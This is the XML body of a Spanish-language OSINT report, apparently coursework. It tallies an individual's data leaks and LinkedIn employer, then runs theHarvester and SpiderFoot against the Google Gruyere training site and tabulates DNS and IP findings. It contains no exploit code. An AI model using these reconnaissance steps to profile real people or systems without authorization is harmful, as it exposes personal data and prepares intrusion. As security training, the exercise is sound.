        <w:p w14:paraId="0CBA78EA" w14:textId="776296BE" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>En este caso nos encontramos con 20 fugas de datos:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1C3DF308" w14:textId="0FA14510" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="38E33168" w14:textId="7933EE3B" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00AE2AF1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71BE6E95" wp14:editId="11C97902">
                <wp:extent cx="5400040" cy="5077460"/>
                <wp:effectExtent l="0" t="0" r="0" b="889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077460"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="58474997" w14:textId="41DEFEF2" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="22E762A2" w14:textId="1353744B" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00AE2AF1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2517B1CD" wp14:editId="561233A0">
                <wp:extent cx="5400040" cy="5022850"/>
                <wp:effectExtent l="0" t="0" r="0" b="635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022850"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="03A11BB2" w14:textId="56B022DA" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3E35DEF6" w14:textId="3C5F535C" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00AE2AF1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3895F786" wp14:editId="0C3A8725">
                <wp:extent cx="5400040" cy="5001260"/>
                <wp:effectExtent l="0" t="0" r="0" b="889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5001260"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="300DBDC0" w14:textId="1A35339D" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0609BEBE" w14:textId="224D558C" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00AE2AF1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79AF2556" wp14:editId="1CE89949">
                <wp:extent cx="5400040" cy="5039995"/>
                <wp:effectExtent l="0" t="0" r="0" b="825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039995"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="0BD78F0A" w14:textId="6797286E" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2CF6EDD6" w14:textId="4D5E5316" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00AE2AF1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36A64783" wp14:editId="4D870078">
                <wp:extent cx="5400040" cy="4020185"/>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020185"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="7EB66B93" w14:textId="77777777" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="11D45F4B" w14:textId="1D4C1CE2" w:rsidR="00BC44A8" w:rsidRDefault="00BC44A8">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Ahora pasaremos a hablar de que </w:t>
          </w:r>
          <w:r w:rsidR="00312E63">
            <w:t>está</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> trabajando, según su perfil de LinkedIn está trabajando para Google:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="24652A64" w14:textId="32340C9B" w:rsidR="00E713B6" w:rsidRPr="00E713B6" w:rsidRDefault="00BC44A8" w:rsidP="00BC44A8">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="421067E8" w14:textId="72B3D5E5" w:rsidR="00EE0ECE" w:rsidRDefault="00BC44A8" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00BC44A8">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D04EF90" wp14:editId="01674AF9">
                <wp:extent cx="4994440" cy="4069897"/>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4440" cy="4069897"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="7821AF2B" w14:textId="77777777" w:rsidR="00BC44A8" w:rsidRDefault="00BC44A8" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5F61EB95" w14:textId="77777777" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="060B0A6B" w14:textId="698FFE6D" w:rsidR="00EE0ECE" w:rsidRDefault="009D1B6F">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="24"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="36" w:name="_Toc128034147"/>
          <w:r>
            <w:t xml:space="preserve">Análisis de la página: </w:t>
          </w:r>
          <w:hyperlink r:id="rId62" w:history="1">
            <w:r w:rsidRPr="00787720">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
              </w:rPr>
              <w:t>https://google-gruyere.appspot.com/</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:t xml:space="preserve"> -&gt;</w:t>
          </w:r>
          <w:bookmarkEnd w:id="36"/>
        </w:p>
        <w:p w14:paraId="54209C53" w14:textId="77777777" w:rsidR="00B266CF" w:rsidRPr="00B266CF" w:rsidRDefault="00B266CF" w:rsidP="00B266CF"/>
        <w:p w14:paraId="0E0AB820" w14:textId="03F7C3FC" w:rsidR="009D1B6F" w:rsidRDefault="009D1B6F" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Primero usare theHarvester, con el comando </w:t>
          </w:r>
          <w:r w:rsidRPr="008353EE">
            <w:rPr>
              <w:color w:val="44546A" w:themeColor="text2"/>
            </w:rPr>
            <w:t>‘theHarvester -d google-gruyere.appspot.com -l 200 -b all -f ./google.html’</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="53264E65" w14:textId="5250A8D0" w:rsidR="009D1B6F" w:rsidRDefault="009D1B6F" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Con -d ingresamos el dominio, con -l limitamos la cantidad de búsquedas, que -b elegimos los buscadores y -f para generar un informe.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7B690F0C" w14:textId="08733740" w:rsidR="009D1B6F" w:rsidRDefault="009D1B6F" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="471B3757" w14:textId="431723C4" w:rsidR="009D1B6F" w:rsidRDefault="009D1B6F" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="009D1B6F">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE1481D" wp14:editId="20143A8E">
                <wp:extent cx="5400040" cy="3232150"/>
                <wp:effectExtent l="0" t="0" r="0" b="635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232150"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="69C3E94C" w14:textId="1BD9F34F" w:rsidR="009D1B6F" w:rsidRDefault="009D1B6F" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1357EA5B" w14:textId="0C077AFD" w:rsidR="009D1B6F" w:rsidRDefault="009D1B6F" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Salida informe:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1605F203" w14:textId="26D0669D" w:rsidR="009D1B6F" w:rsidRDefault="009D1B6F" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="009D1B6F">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB4F4A8" wp14:editId="5366B8E7">
                <wp:extent cx="5400040" cy="559435"/>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559435"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="23FD4FB5" w14:textId="37B618C3" w:rsidR="009D1B6F" w:rsidRDefault="009D1B6F" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Como vemos la salida del informe no tiene contenido, solo consigue la IP, que tampoco tiene ningún mérito.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5FE0CA01" w14:textId="4DB2680C" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="504E6C79" w14:textId="775D0365" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Ahora vamos a usar spiderfoot, al que hará de darle una IP y un puerto con -l:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4658316D" w14:textId="406D06A1" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="31A414C6" w14:textId="7F1F484A" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00101718">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02BC6D9D" wp14:editId="488706DE">
                <wp:extent cx="5400040" cy="2533650"/>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33650"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="6E253052" w14:textId="23BBBA4B" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="73E69680" w14:textId="52DEFB78" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>Ahora navegaremos a su servidor web:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4931C319" w14:textId="4F920734" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00101718">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36F8DE46" wp14:editId="1AEEA08D">
                <wp:extent cx="5400040" cy="541147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5411470"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="302B48C2" w14:textId="0DFD92B4" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Ahora le daremos a New Scan y colocaremos los datos necesarios:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4C98DD27" w14:textId="1F690F64" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1C802A39" w14:textId="03BCA572" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00101718">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B19F93C" wp14:editId="4357842F">
                <wp:extent cx="5400040" cy="541147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5411470"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="7723ABE0" w14:textId="77777777" w:rsidR="00345EC4" w:rsidRDefault="00345EC4" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5ED0CAA4" w14:textId="0AFAE90C" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="56CB2150" w14:textId="0AF36D1D" w:rsidR="00101718" w:rsidRDefault="00101718" w:rsidP="009D1B6F">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Y le daremos a Run Scan Now</w:t>
          </w:r>
          <w:r w:rsidR="00187B0B">
            <w:t>, y esperaremos resultados:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6C880A19" w14:textId="2F2A9A1D" w:rsidR="009D1B6F" w:rsidRDefault="00345EC4" w:rsidP="009D1B6F">
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:tab/>
          </w:r>
          <w:r w:rsidRPr="00345EC4">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A052D32" wp14:editId="1C946392">
                <wp:extent cx="5400040" cy="5411470"/>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5411470"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="10672401" w14:textId="5FDCE931" w:rsidR="003C6804" w:rsidRDefault="003C6804" w:rsidP="009D1B6F"/>
        <w:p w14:paraId="38EAEACC" w14:textId="147207CC" w:rsidR="003C6804" w:rsidRDefault="003C6804" w:rsidP="009D1B6F">
          <w:r>
            <w:t>Ahora pasaré a mostrar los resultados obtenidos</w:t>
          </w:r>
          <w:r w:rsidR="008C192F">
            <w:t>, lo mostraré en tablas</w:t>
          </w:r>
          <w:r>
            <w:t>:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2FAC7699" w14:textId="064EA859" w:rsidR="003C6804" w:rsidRDefault="003C6804" w:rsidP="009D1B6F"/>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Tablaconcuadrcula"/>
            <w:tblW w:w="0" w:type="auto"/>
            <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
          </w:tblPr>
          <w:tblGrid>
            <w:gridCol w:w="1692"/>
            <w:gridCol w:w="2219"/>
            <w:gridCol w:w="987"/>
            <w:gridCol w:w="1798"/>
            <w:gridCol w:w="1798"/>
          </w:tblGrid>
          <w:tr w:rsidR="008C192F" w14:paraId="0100015F" w14:textId="0B3DA719" w:rsidTr="008C192F">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1482" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="7303E514" w14:textId="04300960" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Servidores dominio</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1935" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="77782081" w14:textId="29C13338" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>IP</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="877" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="5683F8F6" w14:textId="4450D2D7" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Nombre de la compañía</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1573" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="1FF2D833" w14:textId="1E09A167" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Servidores correo</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1573" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="2C566DE8" w14:textId="53D7898B" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Dirección física</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="425CE668" w14:textId="241A9F1A" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="008C192F" w14:paraId="320A5DB0" w14:textId="546F8974" w:rsidTr="008C192F">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1482" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="1E197EC1" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="003C6804">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>ns1.google.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="5235F92E" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="003C6804">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>ns3.google.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="62EB0C26" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="003C6804">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>ns4.google.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="1DC3AEEB" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="003C6804">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>ns2.google.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="784147F7" w14:textId="77777777" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F"/>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1935" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="79747B3E" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="003C6804">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>google-gruyere.appspot.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="2EF26EE3" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="003C6804">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.20</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="79E526FA" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="1CB9E999" w14:textId="5552A9EB" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>www.google-gruyere.appspot.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="350F4B11" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="003C6804">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="003C6804">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>216.58.212.116</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7B72C03F" w14:textId="66B3D9DD" w:rsidR="008C192F" w:rsidRPr="003C6804" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="877" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="68C744F3" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="003C6804">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00CD1937">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>Google Inc.</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7C461D74" w14:textId="77777777" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F"/>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1573" w:type="dxa"/>
